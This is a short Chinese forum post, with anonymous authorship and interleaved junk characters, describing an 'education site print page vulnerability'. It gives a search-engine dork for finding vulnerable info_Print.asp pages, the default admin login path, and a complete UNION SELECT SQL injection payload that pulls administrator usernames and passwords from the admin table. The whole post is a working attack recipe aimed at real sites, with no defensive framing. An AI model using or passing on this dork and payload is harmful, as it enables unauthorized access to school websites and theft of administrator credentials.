教育站打印页面漏洞 a7 `% l# s5 S& l6 ]& l" S* P" k
百度或google搜索 inurl:info_Print.asp?ArticleID=# n% j: N) d5 a
默认后台:/ad_login.asp
" e- a; b% w# S z3 L! j6 w; s爆管理员密码:
' ~' Q6 }# Y' v4 F+ [! k* R( }: i在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
1 G6 Q+ J7 L! r1 r
1 w6 H$ ]1 c/ T1 v( E) P. ^union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
. R5 w- U# v3 d0 ^
) X* z7 |: d! H/ x8 I) O7 h作者:佚名
( w5 L. T C+ b" N * F# O. b3 C4 h9 u" T; F7 ^
7 `4 _- d% B F7 D
|